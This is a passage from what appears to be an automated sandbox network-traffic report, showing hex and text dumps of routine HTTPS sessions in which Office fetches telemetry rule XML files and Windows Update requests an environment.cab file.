                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                    Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                    Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                    Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                    Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                    Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                    2024-11-30 10:34:58 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                    2024-11-30 10:34:59 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                    2024-11-30 10:34:59 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                    2024-11-30 10:34:59 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.4497794.245.163.56443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:00 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yYlL1HFAF3FGtYT&MD=6tCKpNkB HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept: */*
                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                    2024-11-30 10:35:01 UTC560INHTTP/1.1 200 OK
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Expires: -1
                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                    MS-CorrelationId: c658526e-9aea-440d-a353-1e73d9b6b493
                                                                                                                    MS-RequestId: 34384b33-2c90-4c4f-82d0-d808cebb3e4c
                                                                                                                    MS-CV: JRXgTtwzmkeu5TFQ.0
                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:00 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 30005
                                                                                                                    2024-11-30 10:35:01 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                    2024-11-30 10:35:01 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    32192.168.2.44978213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:01 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2980
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                    x-ms-request-id: 2ca1f14f-f01e-001f-3f2a-405dc8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103501Z-174f7845968glpgnhC1EWR7uec00000011h00000000026e9
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:01 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    33192.168.2.44978313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:01 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 408
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                    x-ms-request-id: 894800e7-201e-0051-4ca8-427340000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103501Z-174f7845968n2hr8hC1EWR9cag00000010x0000000006mdf
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:01 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    34192.168.2.44978013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:01 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 3788
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                    x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103501Z-174f7845968kdththC1EWRzvxn0000000dk0000000008mys
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:01 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    35192.168.2.44978113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:01 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:01 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:01 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 450
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                    x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103501Z-174f7845968kvnqxhC1EWRmf3g0000000n50000000003pqy
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    36192.168.2.44978413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
